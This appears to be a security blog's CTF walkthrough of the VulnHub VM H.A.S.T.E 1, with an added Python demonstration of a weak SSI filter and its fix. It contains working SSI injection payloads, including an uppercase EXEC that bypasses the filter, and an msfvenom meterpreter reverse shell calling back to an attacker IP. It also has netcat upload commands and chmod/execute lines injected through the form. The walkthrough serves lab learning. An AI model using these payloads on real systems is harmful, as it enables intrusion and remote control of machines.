Amonsec

It's all about digital security.

A simple blog where you can find different things about digital security.

H.A.S.T.E 1: CTF walkthrough

Yesterday (14 October 2017) my leet guys, @ch3rn0byl and @H4v0k, decided to start a new VulnHub VM; despite the late hour, I followed them.

I learned a new attack vector: SSI injection. Thanks.

Timeline:
ch3rn0byl: we just started the haste one if you want to do it (00:28)
[..snip..]
H4v0k: boot it up amon , sleep is for the weak (00:31)
ch3rn0byl: sleep is for the bitchesssssss (00:32)
[..snip..]
ch3rn0byl: fucking haste (02:38)

Note: if you want to learn more about Windows exploit development, you can read ch3rn0byl's blog: here.

 

Introduction

Name: H.A.S.T.E: 1
Release date: 13 Sep 2017

Author: f1re_w1re
Series: H.A.S.T.E
Web page: https://securityshards.wordpress.com/2017/09/13/new-h-a-s-t-e-hacking-challenge/

Aim: get any kind of shell on the system.

 

Reconnaissance

We can find the IP address of the system with arp-scan.

haste_1_ctf_walkthrough_arp_scan.png

Nmap finds only one open port among the default top 1000: 80/tcp.

This will be a pure web CTF.

root@kali:~/Desktop# nmap 192.168.1.46

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-15 08:38 CEST
Nmap scan report for yoda.home (192.168.1.46)
Host is up (0.029s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)

Nmap done: 1 IP address (1 host up) scanned in 61.85 seconds
root@kali:~/Desktop#
 

Website analysis

A quick enumeration of the site structure reveals an SSI page where an ls command is executed, plus several pages with the .shtml extension. Searching for shtml turns up interesting documents and one attack vector: Server-Side Includes (SSI) injection.

Because one input of the HTTP form is not sanitised and ends up in a page that Apache parses for SSI directives, we can execute commands on the system.

Request Body:
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

xxx=Offsec&feedback=<!--#EXEC cmd="whoami; id; pwd" -->
haste_1_ctf_walkthrough_ssi_remote_command_injection.png
haste_1_ctf_walkthrough_ssi_remote_command_response.png

Note: the usual way to execute a command with SSI injection is the lowercase exec directive rather than EXEC, but after a few tries it appears that the literal string exec is stripped by the form validation in the PHP page. The uppercase spelling is not caught by that check and the server still honours it, which is why the payload above uses EXEC. A blacklist that only matches one spelling of a directive name is no protection at all.
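To make that filter bypass concrete, here is an added Python example (mine, not part of the original walkthrough or of the VM's PHP code). It reconstructs, as an assumption, the validation described above as a single-pass, case-sensitive removal of the string exec, shows why the uppercase EXEC survives it, generalises to a second classic bypass of single-pass removal (a nested exeexecc that re-forms exec once the inner match is cut out), and contrasts it with the fix a developer should apply: HTML-encode user input before it is written into any SSI-parsed page, or better, never write it there. The sample form values are constructed.

```python
import html
import re

# Constructed samples (not captured from the VM): the form value used in the
# walkthrough in both spellings, a benign value, and a nested-string bypass.
BENIGN = "Offsec"
PAYLOAD_LOWER = '<!--#exec cmd="whoami; id; pwd" -->'
PAYLOAD_UPPER = '<!--#EXEC cmd="whoami; id; pwd" -->'
PAYLOAD_NESTED = '<!--#exeexecc cmd="id" -->'   # "exec" re-forms after the inner "exec" is removed


def naive_filter(value: str) -> str:
    """Assumed reconstruction of the validation the walkthrough ran into:
    a case-sensitive blacklist that deletes the literal string "exec" once,
    non-recursively (str.replace removes each occurrence in a single pass)."""
    return value.replace("exec", "")


# Case-insensitive detection of an SSI directive opener in the form shown on
# the page: "<!--#" immediately followed by the directive name. Apache
# mod_include honoured the uppercase EXEC on this VM, so a detector must
# ignore case.
SSI_DIRECTIVE = re.compile(r"<!--#([A-Za-z]+)", re.IGNORECASE)


def find_ssi_directive(value: str):
    """Return the directive name (lowercased) if the value still carries a
    usable SSI directive, else None."""
    m = SSI_DIRECTIVE.search(value)
    return m.group(1).lower() if m else None


def safe_render(value: str) -> str:
    """The fix: do not blacklist directive names at all. HTML-encode the value
    before it is written into a file Apache parses for SSI, so the "<!--#"
    opener can never be formed from user input ("<" becomes "&lt;")."""
    return html.escape(value, quote=True)


def demo() -> dict:
    """Run every sample through the weak filter and the fix; report what survives."""
    results = {}
    for name, value in [("benign", BENIGN), ("lower", PAYLOAD_LOWER),
                        ("upper", PAYLOAD_UPPER), ("nested", PAYLOAD_NESTED)]:
        filtered = naive_filter(value)
        results[name] = {
            "after_naive_filter": filtered,
            # Directive name left intact by the blacklist (None = neutralised)
            "directive_survives_filter": find_ssi_directive(filtered),
            # Directive name left after proper encoding (always None)
            "directive_after_escape": find_ssi_directive(safe_render(value)),
        }
    return results


if __name__ == "__main__":
    for name, r in demo().items():
        print(f"{name:7s} after filter: {r['after_naive_filter']!r}")
        print(f"        directive left by filter: {r['directive_survives_filter']}, "
              f"after escaping: {r['directive_after_escape']}")
```

Running it shows the lowercase payload reduced to a directive-less `<!--# cmd=...-->`, while both EXEC and exeexecc come out of the filter as a working exec directive; after html.escape no variant contains `<!--#` at all.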

 

From RCE to reverse shell

As usual, we generate a reverse shell with msfvenom.

root@kali:~/Desktop# msfvenom --platform linux -p linux/x86/meterpreter/reverse_tcp LPORT=1337 LHOST=192.168.1.107 -f elf -o rshell
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: rshell
root@kali:~/Desktop#

Then we upload the reverse shell onto the target with netcat. The order matters: the injected command makes the target listen on port 1337 and write whatever arrives to /tmp/rshell, so it must be sent first (the HTTP request blocks until the transfer completes), and only then does the attacker connect and push the file.

#Step 1 - SSI injection command (target listens and stores the file)
<!--#EXEC cmd="/bin/nc -lvvp 1337 > /tmp/rshell" -->

#Step 2 - attacker command (push the payload to the listener)
nc -nvv 192.168.1.46 1337 < rshell

We configure our meterpreter listener.

root@kali:~/Desktop# msfconsole -q 
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
msf exploit(handler) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.107:1337 
msf exploit(handler) >

We make the file executable and run it, still through the SSI injection.

#Set permission to executable
<!--#EXEC cmd="chmod +x /tmp/rshell" -->

#Execute the reverse shell
<!--#EXEC cmd="/tmp/rshell" -->
haste_1_ctf_walkthrough_low_priv_reverse_shell.png
 
 
